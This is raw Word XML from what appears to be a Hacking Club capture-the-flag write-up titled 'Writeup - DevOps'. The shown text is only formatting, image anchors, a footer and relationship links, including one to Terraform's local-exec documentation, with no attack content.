      <w:spacing w:line="240" w:lineRule="auto"/>
      <w:ind w:left="-1276" w:right="289" w:firstLine="1276"/>
      <w:jc w:val="both"/>
      <w:rPr>
        <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
        <w:color w:val="7f7f7f"/>
        <w:sz w:val="18"/>
        <w:szCs w:val="18"/>
        <w:shd w:fill="9a309b" w:val="clear"/>
      </w:rPr>
    </w:pPr>
    <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
      <w:rPr>
        <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
        <w:color w:val="7f7f7f"/>
        <w:sz w:val="18"/>
        <w:szCs w:val="18"/>
        <w:rtl w:val="0"/>
      </w:rPr>
      <w:t xml:space="preserve">© 2026 Hacking Club | All rights reserved </w:t>
      <w:tab/>
      <w:tab/>
      <w:t xml:space="preserve">          </w:t>
      <w:tab/>
      <w:tab/>
      <w:tab/>
      <w:t xml:space="preserve">                                          Page </w:t>
    </w:r>
    <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
      <w:rPr>
        <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
        <w:color w:val="7f7f7f"/>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6B">
    <w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
      </w:rPr>
    </w:pPr>
    <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_heading=h.175f5cs94z0o" w:id="13"/>
    <w:bookmarkEnd w:id="13"/>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-866770</wp:posOffset>
          </wp:positionH>
          <wp:positionV relativeFrom="paragraph">
            <wp:posOffset>95250</wp:posOffset>
          </wp:positionV>
          <wp:extent cx="719138" cy="232221"/>
          <wp:effectExtent b="0" l="0" r="0" t="0"/>
          <wp:wrapNone/>
          <wp:docPr id="63" name="image2.jpg"/>
          <a:graphic>
            <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
              <pic:pic>
                <pic:nvPicPr>
                  <pic:cNvPr id="0" name="image2.jpg"/>
                  <pic:cNvPicPr preferRelativeResize="0"/>
                </pic:nvPicPr>
                <pic:blipFill>
                  <a:blip r:embed="rId1"/>
                  <a:srcRect b="28627" l="0" r="-7644" t="36271"/>
                  <a:stretch>
                    <a:fillRect/>
                  </a:stretch>
                </pic:blipFill>
                <pic:spPr>
                  <a:xfrm>
                    <a:off x="0" y="0"/>
                    <a:ext cx="719138" cy="232221"/>
                  </a:xfrm>
                  <a:prstGeom prst="rect"/>
                  <a:ln/>
                </pic:spPr>
              </pic:pic>
            </a:graphicData>
          </a:graphic>
        </wp:anchor>
      </w:drawing>
    </w:r>
  </w:p>
  <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000006C">
    <w:pPr>
      <w:jc w:val="center"/>
      <w:rPr>
        <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
        <w:b w:val="1"/>
        <w:bCs w:val="1"/>
        <w:color w:val="000000"/>
        <w:sz w:val="32"/>
        <w:szCs w:val="32"/>
      </w:rPr>
    </w:pPr>
    <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
      <w:rPr>
        <w:rtl w:val="0"/>
      </w:rPr>
    </w:r>
  </w:p>
  <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000006D">
    <w:pPr>
      <w:rPr/>
    </w:pPr>
    <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
      <w:rPr/>
      <w:pict>
        <v:shape id="WordPictureWatermark1" style="position:absolute;width:617.76pt;height:793.4866141732284pt;rotation:0;z-index:-503316481;mso-position-horizontal-relative:margin;mso-position-horizontal:absolute;margin-left:-73.98425196850394pt;mso-position-vertical-relative:margin;mso-position-vertical:absolute;margin-top:-1.2459055118110236pt;" alt="" type="#_x0000_t75">
          <v:imagedata cropbottom="0f" cropleft="0f" cropright="0f" croptop="0f" r:id="rId2" o:title="image1.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-942970</wp:posOffset>
          </wp:positionH>
          <wp:positionV relativeFrom="paragraph">
            <wp:posOffset>0</wp:posOffset>
          </wp:positionV>
          <wp:extent cx="7820025" cy="10085729"/>
          <wp:effectExtent b="0" l="0" r="0" t="0"/>
          <wp:wrapNone/>
          <wp:docPr id="48" name="image3.png"/>
          <a:graphic>
            <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
              <pic:pic>
                <pic:nvPicPr>
                  <pic:cNvPr id="0" name="image3.png"/>
                  <pic:cNvPicPr preferRelativeResize="0"/>
                </pic:nvPicPr>
                <pic:blipFill>
                  <a:blip r:embed="rId1"/>
                  <a:srcRect b="8816" l="0" r="0" t="0"/>
                  <a:stretch>
                    <a:fillRect/>
                  </a:stretch>
                </pic:blipFill>
                <pic:spPr>
                  <a:xfrm>
                    <a:off x="0" y="0"/>
                    <a:ext cx="7820025" cy="10085729"/>
                  </a:xfrm>
                  <a:prstGeom prst="rect"/>
                  <a:ln/>
                </pic:spPr>
              </pic:pic>
            </a:graphicData>
          </a:graphic>
        </wp:anchor>
      </w:drawing>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-344480</wp:posOffset>
              </wp:positionH>
              <wp:positionV relativeFrom="paragraph">
                <wp:posOffset>5771833</wp:posOffset>
              </wp:positionV>
              <wp:extent cx="6686550" cy="3005191"/>
              <wp:effectExtent b="0" l="0" r="0" t="0"/>
              <wp:wrapNone/>
              <wp:docPr id="46" name=""/>
              <a:graphic>
                <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingShape">
                  <wps:wsp>
                    <wps:cNvSpPr/>
                    <wps:cNvPr id="2" name="Shape 2"/>
                    <wps:spPr>
                      <a:xfrm>
                        <a:off x="2390550" y="2454150"/>
                        <a:ext cx="5910900" cy="2651700"/>
                      </a:xfrm>
                      <a:prstGeom prst="rect">
                        <a:avLst/>
                      </a:prstGeom>
                      <a:noFill/>
                      <a:ln>
                        <a:noFill/>
                      </a:ln>
                    </wps:spPr>
                    <wps:txbx>
                      <w:txbxContent>
                        <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000">
                          <w:pPr>
                            <w:spacing w:after="120" w:before="480" w:line="275.9999942779541"/>
                            <w:ind w:left="0" w:right="0" w:firstLine="0"/>
                            <w:jc w:val="center"/>
                            <w:textDirection w:val="btLr"/>
                          </w:pPr>
                          <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
                            <w:rPr>
                              <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
                              <w:b w:val="0"/>
                              <w:i w:val="1"/>
                              <w:smallCaps w:val="0"/>
                              <w:strike w:val="0"/>
                              <w:color w:val="ffffff"/>
                              <w:sz w:val="48"/>
                              <w:vertAlign w:val="baseline"/>
                            </w:rPr>
                            <w:t xml:space="preserve">Writeup - </w:t>
                          </w:r>
                          <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
                            <w:rPr>
                              <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
                              <w:b w:val="0"/>
                              <w:i w:val="1"/>
                              <w:smallCaps w:val="0"/>
                              <w:strike w:val="0"/>
                              <w:color w:val="ffffff"/>
                              <w:sz w:val="48"/>
                              <w:vertAlign w:val="baseline"/>
                            </w:rPr>
                            <w:t xml:space="preserve">DevOps</w:t>
                          </w:r>
                        </w:p>
                      </w:txbxContent>
                    </wps:txbx>
                    <wps:bodyPr anchorCtr="0" anchor="ctr"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-344480</wp:posOffset>
              </wp:positionH>
              <wp:positionV relativeFrom="paragraph">
                <wp:posOffset>5771833</wp:posOffset>
              </wp:positionV>
              <wp:extent cx="6686550" cy="3005191"/>
              <wp:effectExtent b="0" l="0" r="0" t="0"/>
              <wp:wrapNone/>
              <wp:docPr id="46" name="image23.png"/>
              <a:graphic>
                <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                  <pic:pic>
                    <pic:nvPicPr>
                      <pic:cNvPr id="0" name="image23.png"/>
                      <pic:cNvPicPr preferRelativeResize="0"/>
                    </pic:nvPicPr>
                    <pic:blipFill>
                      <a:blip r:embed="rId2"/>
                      <a:srcRect/>
                      <a:stretch>
                        <a:fillRect/>
                      </a:stretch>
                    </pic:blipFill>
                    <pic:spPr>
                      <a:xfrm>
                        <a:off x="0" y="0"/>
                        <a:ext cx="6686550" cy="3005191"/>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pBdr>
        <w:top w:space="0" w:sz="0" w:val="nil"/>
        <w:left w:space="0" w:sz="0" w:val="nil"/>
        <w:bottom w:space="0" w:sz="0" w:val="nil"/>
        <w:right w:space="0" w:sz="0" w:val="nil"/>
        <w:between w:space="0" w:sz="0" w:val="nil"/>
      </w:pBdr>
      <w:tabs>
        <w:tab w:val="center" w:leader="none" w:pos="4252"/>
        <w:tab w:val="right" w:leader="none" w:pos="8504"/>
      </w:tabs>
      <w:spacing w:line="240" w:lineRule="auto"/>
      <w:rPr>
        <w:color w:val="000000"/>
      </w:rPr>
    </w:pPr>
    <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
      <w:rPr>
        <w:color w:val="000000"/>
      </w:rPr>
      <w:pict>
        <v:shape id="WordPictureWatermark2" style="position:absolute;width:617.76pt;height:793.4866141732284pt;rotation:0;z-index:-503316481;mso-position-horizontal-relative:margin;mso-position-horizontal:center;mso-position-vertical-relative:margin;mso-position-vertical:center;" alt="" type="#_x0000_t75">
          <v:imagedata cropbottom="0f" cropleft="0f" cropright="0f" croptop="0f" r:id="rId1" o:title="image1.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6.png"/><Relationship Id="rId22" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image4.png"/><Relationship Id="rId21" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image9.png"/><Relationship Id="rId24" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image5.png"/><Relationship Id="rId23"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8.png"/><Relationship Id="rId26" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image21.png"/><Relationship Id="rId25" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image11.png"/><Relationship Id="rId28" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image7.png"/><Relationship Id="rId27" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image6.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eader" Target="header1.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://app.hackingclub.com/training/training-machines/39" TargetMode="External"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://discord.com/channels/705946302105649153/1173705871046475796" TargetMode="External"/><Relationship Id="rId31" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/header" Target="header3.xml"/><Relationship Id="rId30" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/header" Target="header2.xml"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.terraform.io/docs/language/resources/provisioners/local-exec.html" TargetMode="External"/><Relationship Id="rId33" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/footer" Target="footer2.xml"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image14.png"/><Relationship Id="rId32" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/footer" Target="footer1.xml"/><Relationship Id="rId13" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image19.png"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image12.png"/><Relationship Id="rId34" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/footer" Target="footer3.xml"/><Relationship Id="rId15" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image22.png"/><Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image15.png"/><Relationship Id="rId17" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image13.png"/><Relationship Id="rId16" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image20.png"/><Relationship Id="rId19" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image10.png"/><Relationship Id="rId18" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image17.png"/></Relationships>
</file>

<file path=word/_rels/fontTable.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?><Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/IBMPlexSans-regular.ttf"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/IBMPlexSans-bold.ttf"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/IBMPlexSans-italic.ttf"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/IBMPlexSans-boldItalic.ttf"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/IBMPlexSansSemiBold-italic.ttf"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/IBMPlexSansSemiBold-bold.ttf"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/IBMPlexSansSemiBold-boldItalic.ttf"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/IBMPlexSansSemiBold-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 Id="rId2"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3.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SJ9/UV9ZV19A3rncRgOpwOO0Ug==">CgMxLjAyDmgubWQ1eDI5eGxxOGRpMg5oLncxaGN6OHhqcnZmNTIOaC42Z2p5eWZ3eWl1MDIyDmgubGUzYWxjYXhkZjRvMg5oLnBvdHpla3Z3eDZjdTIOaC45ZmV6Z3NuZHNhdnQyDmgudGR2NzBkMXBzMmdsMg5oLjZjZ3Rqcjc4emxrejIOaC53Z3F6endqdmlnaHIyDmguYjRlMDUybjczYzY2Mg5oLmswOGQ0ZjNleGNqdTIOaC5tMHRmM2t2MjY3eWgyDWgudmoxcTJ0cGI3cmwyDmguMTc1ZjVjczk0ejBvOAByITFja1N4Q0NFb2lRQmlIN0hYT0JxcC1Femo1dlJieHlLc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